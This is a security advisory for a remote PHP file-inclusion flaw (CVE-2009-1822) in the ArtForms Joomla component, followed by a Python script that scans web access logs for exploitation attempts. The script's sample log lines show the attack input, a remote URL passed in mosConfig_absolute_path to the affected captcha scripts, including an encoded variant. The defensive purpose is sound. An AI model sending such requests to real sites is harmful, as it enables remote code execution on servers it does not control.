Interjoomla · Interjoomla Artforms · CVE-2009-1822
Name of the Vulnerable Software and Affected Versions:
InterJoomla ArtForms (`com_artforms`) component version 2.1b7 for Joomla!
Description:
The issue allows remote attackers to execute arbitrary PHP code via a URL in the `mosConfig_absolute_path` parameter to specific PHP files: (1) `imgcaptcha.php` or (2) `mp3captcha.php` in `assets/captcha/includes/captchaform/`, or (3) `swfmovie.php` in `assets/captcha/includes/captchatalk/`.
Recommendations:
For InterJoomla ArtForms (`com_artforms`) component version 2.1b7, consider restricting access to the `mosConfig_absolute_path` parameter in the affected PHP files until a patch is available. As a temporary workaround, avoid using the `mosConfig_absolute_path` parameter in the `imgcaptcha.php`, `mp3captcha.php`, and `swfmovie.php` files. At the moment, there is no information about a newer version that contains a fix for this issue.
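While no fixed version is known, web server access logs can be reviewed for requests that pass `mosConfig_absolute_path` to the three scripts named above. The following is an added example, not code from the advisory or from the component's authors. It assumes combined-format access logs; the install prefix `/components/com_artforms/`, the function names and the sample log entries are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The three scripts named in the advisory, relative to the component directory.
AFFECTED = (
    "assets/captcha/includes/captchaform/imgcaptcha.php",
    "assets/captcha/includes/captchaform/mp3captcha.php",
    "assets/captcha/includes/captchatalk/swfmovie.php",
)
PARAM = "mosConfig_absolute_path"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request line in a log entry
REMOTE_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)  # value is a URL, not a path

def classify(line):
    """Return None, 'param-present' or 'remote-url' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Decode and normalise so %xx, '//' and '/./' cannot hide the script name.
    target = urlsplit("/" + m.group(1).lstrip("/"))
    path = posixpath.normpath(unquote(target.path)).lower()
    if not path.endswith(tuple("/" + p for p in AFFECTED)):
        return None
    verdict = None
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        # PHP rewrites '.' and ' ' in incoming parameter names to '_'.
        if re.sub(r"[ .]", "_", key) != PARAM:
            continue
        if REMOTE_RE.match(value):
            return "remote-url"
        verdict = "param-present"
    return verdict

# Constructed sample entries (documentation addresses, assumed install prefix).
PREFIX = "/components/com_artforms/"
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Jun/2009:10:00:01 +0000] "GET {PREFIX}{AFFECTED[0]}?{PARAM}=http://example.invalid/a HTTP/1.1" 200 512',
    f'203.0.113.7 - - [01/Jun/2009:10:00:02 +0000] "GET {PREFIX}{AFFECTED[2]}?mosConfig.absolute.path=http%3A%2F%2Fexample.invalid%2Fa HTTP/1.1" 200 512',
    f'198.51.100.4 - - [01/Jun/2009:10:00:03 +0000] "GET {PREFIX}{AFFECTED[1]}?{PARAM}=/var/www HTTP/1.1" 200 512',
    f'198.51.100.4 - - [01/Jun/2009:10:00:04 +0000] "GET {PREFIX}{AFFECTED[0]}?id=3 HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jun/2009:10:00:05 +0000] "GET /index.php?option=com_artforms HTTP/1.1" 200 9000',
]

def scan(lines):
    """Return (line_number, verdict) for every entry worth reviewing."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]

print(scan(SAMPLE_LOG))
```

A `remote-url` verdict matches the condition the description gives (a URL in the parameter); `param-present` marks a request that sets the parameter to a non-URL value and is reported separately for review.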